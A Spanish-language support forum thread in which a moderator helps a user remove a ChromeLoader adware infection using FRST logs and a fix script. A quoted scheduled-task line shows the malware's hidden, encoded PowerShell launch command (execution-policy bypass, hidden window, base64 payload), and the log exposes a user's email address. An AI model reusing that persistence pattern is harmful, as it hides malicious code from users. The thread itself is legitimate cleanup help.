Powershell se abre solo

Resuelto/Cerrado
Hola,
Cuando estoy en mi PC, PowerShell se abre solo cada 5 minutos, lo que me molesta. Creo que es un virus. ¿Alguien podría ayudarme?

Gracias

Configuración: iPhone / Safari 15.2

6 respuestas

  1. Moderador
    Hola,
    Descarga FRST una vez descargado guárdalo en el escritorio luego haz clic derecho sobre FRST y elige Ejecutar como administrador verás esto:

    Haz clic en Analizar

    Atención, espera bien a que los mensajes diciendo que el análisis ha terminado se muestren


    Al finalizar el análisis tendrás dos archivos de texto en el escritorio FRST y Addition, .
    Luego envía los informes FRST y ADDITION a CJOINT
    ve ESTE TUTORIAL luego proporciona los dos enlaces generados por Cjoint en tu respuesta.

    --
    bazfile
    Moderador/Contribuidor de seguridad.
    un saludo, una respuesta, un gracias siempre son bienvenidos.
    0
    1. 0
      1. ¿Has podido encontrar el error?
        0
      2. Moderador
        El informe "Adición" está incompleto.

        Tu pc está muy infectado, tendrás que ser más cautelosa y evitar hacer clic sin pensar.

        Tienes el navegador Yandex, ¿eres tú quien lo instaló?

        Procedimiento a realizar en el orden indicado:

        En primer lugar desinstala los siguiente programas con RevoUninstaller en modo escaneo avanzado:
        - CleanMyPC
        - Segurazo Realtime Protection Lite
        - SSOption
        - Wondershare Helper Compact

        Tutorial Revo Uninstaller para leer atentamente.






        Aceptar la desinstalación del programa que se desea desinstalar y si aparece un mensaje de error diciendo que la desinstalación es imposible, cerrar el mensaje de error y continuar con el procedimiento.


        Marcar "Escaneo avanzado" y luego hacer clic en "Escanear".


        Hacer clic en "Seleccionar todo" y luego en "Eliminar"; si aparece una segunda lista, hacer lo mismo; luego de que todo se haya eliminado, hacer clic en "Finalizar", puede que se pida un reinicio.

        Desinfección.

        1- Abre FRST como administrador, para ello haz clic derecho en FRST y elige ejecutar como administrador
        2 - Copia todo el script que se encuentra en el cuadro siguiente:
        Start::
        CreateRestorePoint:
        CloseProcesses:
        GroupPolicy: Restriction ?
        HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction
        HKLM\SOFTWARE\Policies\Google: Restriction
        HKLM-x32\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe [2133728 2017-09-12] (Wondershare Technology Co.,Ltd -> Wondershare)
        Task: {1C4A1181-1E34-490E-A191-39D3E6AA0FB2} - System32\Tasks\Opera scheduled Autoupdate 1588591720 => C:\Users\alexc\AppData\Local\Programs\Opera\launcher.exe --scheduledautoupdate $(Arg0) (Sin archivo)
        Task: {2CCBA2E7-941D-4323-B415-272D7501A228} - System32\Tasks\AdobeAAMUpdater-1.0-MicrosoftAccount-alexcognon@yahoo.fr => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe -mode=scheduled (Sin archivo)Task: {2CCBA2E7-941D-4323-B415-272D7501A228} - System32\Tasks\AdobeAAMUpdater-1.0-MicrosoftAccount-alexcognon@yahoo.fr => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe -mode=scheduled (Sin archivo)
        Task: {7E11B7E3-6BA9-4753-B443-CB4AC970CEFC} - System32\Tasks\AMDLinkUpdate => C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe -AMDLinkUpdate (Sin archivo)
        Task: {99423343-A9BE-485F-8348-8E1B4DC190C2} - System32\Tasks\ChromeLoader => cmd /c start /min "" powershell -ExecutionPolicy Bypass -WindowStyle Hidden -E JABlAHgAdABQAGEAdABoACAAPQAgACIAJAAoACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQApAFwAYwBoAHIAbwBtAGUAIgAKACQAYwBvAG4AZgBQAGEAdABoACAAPQAgACIAJABlAHgAdABQAGEAdABoAFwAYwBvAG4AZgAuAGoAcwAiAAoAJABhAHIAYwBoAGkAdgBlAE4AYQBtAGUAI (el elemento de datos tiene 4315 caracteres más).
        Edge HomeButtonPage: HKU\S-1-5-21-1722835910-503718021-2123007925-1001 -> hxxps://www.yandex.ru/?win=463&clid=2341035-18
        Edge Extension: (Sin nombre) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [no encontrado(a)]
        Edge Extension: (Sin nombre) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [no encontrado(a)]
        Edge Extension: (Sin nombre) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [no encontrado(a)]
        Edge Extension: (Sin nombre) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [no encontrado(a)]
        Edge DefaultSearchURL: Default -> hxxps://fr.search.yahoo.com/yhs/search?hspart=ner&hsimp=yhs-001&type=aee_84d015defd161c9282¶m1=ArFaIWJoNqArQGMVADwgQGR7B7NoN9InxrFbMmYsQGMVw7ofB6poNqAqAXFaIWQBvmE4ICILNopcGWUIvmFdICIVNVI4ISoVNVE4J6k4NVQ3vqYXNVBdJ6IWwVM3vCILNVJdESk8NUM9Jmk3vmk3vCILNFdbDSk8vFE9ImoVvFQ9ImIVwVA3vCoXwV5cGWUWvmFcJmoUNEA3vCILNFdcIaUXNEBcGqQANFdcFCk8NoM9JGYXwVM3vGYXvmo9ISoUwVw9JGYYvFJdISISNVJdJGYTvFI9I6IYwVVdJ6IVwVw4JaYVvmpdJCIVwVI9JaYUwVM9ISIVvFRbFCILNF9cIqUXNolcEqULNopcGWUIvmFbF6IYwVVcG6IXvFM4ICoWwVQ9I6k4vmpcFCIVwVw4IGUJvFI9J6ISNEM4JmoWwVM9I6k3wVNcFSIYwVQ3vmoVNEY4JaUIwVQ4JaQIwV5dJGYNvmE4ICILNFRbDqUDNEJcFaULvmE9GqUINolcJqUJNEQ3wCIWvFI4JmoVwVI4ISk4wVU4ISIWQGR7B6RoN9J8LWZ6MWZcMWZoNqAsQGMVvDIlC6MuNGouNasuwCYpC7EmyCYbxU1dNU1dNXFbMn0aC6AoxrFaIWVdOqZoNqAexbFaIUwkynIew6NoNpRcNXFbJpseyDF%3D¶m2=MGN9NqF6Matb&p={searchTerms}
        Edge DefaultSearchKeyword: Default -> buscar por yahoo
        FF Homepage: Mozilla\Firefox\Profiles\nahd6ha2.default -> hxxps://www.yandex.ru/?win=463&clid=2341035-18
        FF SearchPlugin: C:\Users\alexc\AppData\Roaming\Mozilla\Firefox\Profiles\nahd6ha2.default\searchplugins\yandex.ru-20202315.xml [2020-11-15]
        CHR Notifications: Default -> hxxps://app.slack.com; hxxps://aternos.org; hxxps://download-alert.com; hxxps://maviedechat.net; hxxps://p4.maranhesduve.club; hxxps://padlet.com; hxxps://personal-video.live; hxxps://qbqra.mybuzz.fun; hxxps://tvplusnewtab.com; hxxps://userscloud.com; hxxps://www.marmiton.org; hxxps://www.serials.ws; hxxps://www1a.debrahinton.pro; hxxps://www1a.ramirocampos.pro; hxxps://www51.zippyshare.com
        CHR HomePage: Default -> hxxps://fr.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wnf_secureddownload_16_48_ssg02¶m1=1¶m2=f%3D1%26b%3Dchmm%26cc%3Dfr%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1QzutDtDtBtCyD0CyDyD0BtDtD0FtC0B0CyEtN0D0Tzu0StCyBzyyEtN1L2XzutAtFtByDtFtCtFyDtBtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StD0B0D0BtByC0EzztGyDtD0CzytG0CzyzztCtGtD0D0AyCtG0B0A0DtBtByBtB0AtAtDtC0C2QtN1M1F1B2Z1V1N2Y1L1Qzu2Szy0AyCzy0BtD0FyBtGtCtD0BtDtGyEtD0AyBtGzz0ByC0AtGtC0FtAtAzzyCtDtByBtA0AyB2QtN0A0LzuyE%26cr%3D1050113949%26a%3Dwnf_secureddownload_16_48_ssg02%26os_ver%3D6.1%26os%3DWindows%2B7%2BProfessional
        CHR HKLM\...\Chrome\Extension: [bhoagceacaklimpcejjofabngcjkebfg]
        CHR HKLM\...\Chrome\Extension: [nccfgpamboionigdpfjmijhlgmgdbael]
        CHR HKU\S-1-5-21-1722835910-503718021-2123007925-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [bhoagceacaklimpcejjofabngcjkebfg]
        CHR HKU\S-1-5-21-1722835910-503718021-2123007925-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [mjmpfdkmpojoeemjmfiddlhkkndcdpno]
        CHR HKU\S-1-5-21-1722835910-503718021-2123007925-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [nccfgpamboionigdpfjmijhlgmgdbael]
        CHR HKLM-x32\...\Chrome\Extension: [bhoagceacaklimpcejjofabngcjkebfg]
        CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck]
        CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki]
        CHR HKLM-x32\...\Chrome\Extension: [nccfgpamboionigdpfjmijhlgmgdbael]
        CHR HKLM-x32\...\Chrome\Extension: [ohhcpmplhhiiaoiddkfboafbhiknefdf]
        2022-01-08 22:22 - 2022-01-08 22:22 - 000012830 _____ C:\WINDOWS\system32\Tasks\ChromeLoader
        2022-01-08 15:58 - 2022-01-08 15:58 - 000108784 _____ C:\Users\alexc\AppData\Roaming\whw.exe
        2022-01-08 15:58 - 2022-01-08 15:58 - 000012288 _____ C:\Users\alexc\AppData\Roaming\e3dwefw.exe
        S2 InnocentKalaga; C:\Program Files (x86)\InnocentKalaga\InnocentKalaga.exe [5948912 2018-04-05] (Apps Delivered Ltd -> Innocent Kalaga) [Archivo no firmado]
        YAN DefaultSearchURL: Default -> hxxps://browser-resources.s3.yandex.net/old/get/browser/launcher_images/windows/yandex/pochta_win.targetsize-256.png
        YAN Extension: (Я.Почта) - C:\Users\alexc\AppData\Local\Yandex\YandexBrowser\User Data\Default\Extensions\bcadigmkecmhhknameopgaidphameinh [2020-11-15]
        HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
        HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page =
        HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
        HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
        HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
        HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
        HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
        HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page =
        HKU\S-1-5-21-1722835910-503718021-2123007925-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.yandex.ru/?win=463&clid=2341035-18
        SearchScopes: HKU\S-1-5-21-1722835910-503718021-2123007925-1001 -> DefaultScope b5eaa8b0-276f-11eb-bd76-e0d55e69b8bf URL = hxxps://yandex.ru/search/?win=463&clid=2341036-18&text={searchTerms}
        SearchScopes: HKU\S-1-5-21-1722835910-503718021-2123007925-1001 -> b5eaa8b0-276f-11eb-bd76-e0d55e69b8bf URL = hxxps://yandex.ru/search/?win=463&clid=2341036-18&text={searchTerms}
        cmd: netsh advfirewall reset
        Hosts:
        EmptyTemp:
        End::

        3- Una vez copiado el script haz clic en Corregir, FRST tomará automáticamente el script que está en el portapapeles.



        Deja que la corrección se complete, una vez que termine se te pedirá reiniciar tu pc, hazlo tan pronto como se te pida, ver más abajo.

        IMPORTANTE: una vez que tu computadora se reinicie:

        4- Tendrás un archivo Fixlog en tu escritorio, luego envía estos informes a https://www.cjoint.com/ consulta este tutorial y luego proporciona el enlace generado por Cjoint en tu próximo mensaje.

        IMPORTANTE:

        5- Restablece Google Chrome con ESTE SOFTWARE.
        Luego:

        6- VERIFICA Y DIME SI TU PROBLEMA SIGUE PRESENTE


        PARA INFORMACIÓN:

        Tu versión de Windows 10 no está actualizada, para verificarlo ve a esta página haz clic en Actualizar ahora, esto iniciará la descarga de la herramienta de Microsoft, solo será necesario abrirla y te permitirá actualizar Windows 10 a la última versión y te dirá si es compatible con tu pc, ten cuidado esta actualización dura un tiempo, si tienes una computadora portátil conéctala a la corriente, porque sería una lástima que se te acabe la batería antes de que la actualización termine.
        0
    2. Ok gracias, lo haré y no, no fui yo quien instaló el navegador.
      0
      1. Moderador
        En este caso, una vez que se haya completado el procedimiento anterior, para eliminar Yandex haz una nueva corrección FRST con este script:
        Start::
        CreateRestorePoint:
        CloseProcesses:
        C:\Users\alexc\AppData\Local\Yandex
        YAN Profile: C:\Users\alexc\AppData\Local\Yandex\YandexBrowser\User Data\Default [2020-11-15]
        YAN DefaultSearchURL: Default -> hxxps://browser-resources.s3.yandex.net/old/get/browser/launcher_images/windows/yandex/pochta_win.targetsize-256.png
        YAN Extension: (Я.Почта) - C:\Users\alexc\AppData\Local\Yandex\YandexBrowser\User Data\Default\Extensions\bcadigmkecmhhknameopgaidphameinh [2020-11-15]
        End::
        0
    3. ¿Está bien que la corrección lleve tiempo?
      0
      1. No, en realidad está bien, acaba de terminar.
        0
      2. Moderador
        @NatEl fixlog es bueno, dame el enlace del segundo fixlog para la eliminación de Yandex, ve mi mensaje anterior.
        0
      3. @bazfileEstá bien, espera 2 minutos.
        0
    4. Sí, por ahora el error ya no está presente. Gracias.
      Ahora voy a instalar la última versión de Windows 10;
      0
      1. Moderador
        OK, la infección ha sido eliminada, pongo el tema como resuelto.
        Puedes desinstalar FRST, renombra el archivo FRST que has descargado, cámbialo a uninstall, luego, una vez renombrado, ábrelo; la desinstalación se realizará automáticamente al reiniciar el PC.
        0